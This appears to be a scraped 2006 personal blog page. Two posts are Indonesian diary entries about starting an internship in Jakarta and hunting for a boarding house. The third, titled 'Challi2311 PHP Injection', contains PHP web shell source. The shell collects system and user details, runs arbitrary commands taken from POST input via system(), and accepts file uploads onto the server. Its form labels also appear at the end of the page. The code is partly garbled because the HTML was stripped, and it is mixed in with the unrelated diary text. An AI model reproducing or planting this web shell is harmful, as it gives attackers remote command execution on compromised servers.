ChaLLI 2311

2006-08-06T02:22:00.000-07:00

CHaLLI2311

Everybody know their limits, you just got more than others.

Search in everymind, looking for knowledge. Hacking is an art.

# Challi2311 PHP Injection

# Released by : Ch W.G

closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
if(!$whoami)$whoami=exec("whoami");
?>

$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>

}
?>

:

User Info: uid=() euid=() gid=
$gid ?>()

Current Path:

Permission Directory:

Server Services:

Server Address:

Script Current User:

PHP Version:

set_magic_quotes_runtime(0);

$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
$currentWD = $SCWD;
}

if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}

print "

";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "Error while uploading file!";
} else {
print "

";
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "

File uploaded successfully!";
}
} else {
print "\n\n\n

\n";
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
  system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm 
/tmp/cmdtemp");
    print "\n

\n\n\n

Command completed";
}

exit;

?>

2006-08-06T01:55:00.000-07:00

2006-06-12T22:32:00.000-07:00

hari ini adalah hari pertamaku masuk kerja. Awalnya aku bengong-bengong aja, ga tau mau kerja apa. Lalu kak Dedi nyuruh aku nginstall sebuah CPU dengan SO Xp. Semuanya berjalan lancar-lancar aja.. !! Setelah itu aku makan siang bareng Agus dan Iden. Tapi nyari warung nasi susah juga, akhirnya kita makan mie aja di Warkop. Setelah itu balik lagi ke B1. Tapi ngga ada kerjaan lagi sampe sore....

Malamnya kami cari kossan baru. Soalnya kossan lama sudah ngga layak pake. Banyak KECOAKNYA !!!! hehehhe... Maklum laki-laki. Kami keliling Pangkalan Jati 2, tapi ngga ketemu juga.. Akhirnya kami ke Jati 3. Kata si Iden dia pernah liat kossan di sana. Sampai di sana ternyata kontrakan itu sudah penuh. Lalu kami nanya, di mana lagi ada kossan yang masih kosong. Katanya di Gank depan TK ada. Lalu kami ke sana Untung aja masih ada satu yang kosong. Ternyata yang punya adalah Pak haji. Aku, Iden & Agus langsung daftar. Trus anak ibu koss antar kami liat2 kossan. "@@ Anak ibu koss cakep juga guys@@". Kami diperbolehkan mindahin barang malam itu juga. Lalu kami balik ke B1 dan beritahu teman-teman yang lain. Mereka semua setuju ** ya iyalah !! Siapa yang betah tidur ma KECOAK....**. Malam itu juga kami semua langsung mindahin barang. ( 'kecuali Iden. Soalnya giliran dia jaga malam' ).

2006-06-11T22:52:00.000-07:00

Hari ini adalah hari pertamaku magang di ICT Centre Jakarta. Awalnya aku datang di Jawis 2, Karena kata kepala sekolahku kantornya ada di Sekolah tersebut. Ternyata kata Penjaga sekolah, kantornya sudah pindah. Untung saja kantor tersebut tidak jauh dari jawis. Jadi aku tidak susah mencarinya. Tiba di B1 aku disambut anak magang juga. yang belakangan ku kenal namanya Agus (Dari Kalimantan Selatan). Hari itu kakak-kakaknya tidak masuk kerja. ya jelas saja... kan hari minggu

Lalu oleh agus aku dikenalin sama anak magang lainnya. ada Iden dari Rangkas, Pasya dari Rangkas too, Febby dari rangkas, Wina dari Rangkas "wah kak Rizall curang nich. dari rangkas banyak amat. aku cuma diterima satu doank", Adim dari Bondowoso, Andika dari Magetan, Hunter dari ???? (sorry aku lupa heheeheh).

siangnya aku makan siang bareng agus, ternyata si Agus baru seminggu juga di sini. Setelah itu aku kembali ke B1 untuk istirahat................. Sleeeeeeeeeepppppp

Execute command:
Change directory:
Upload file: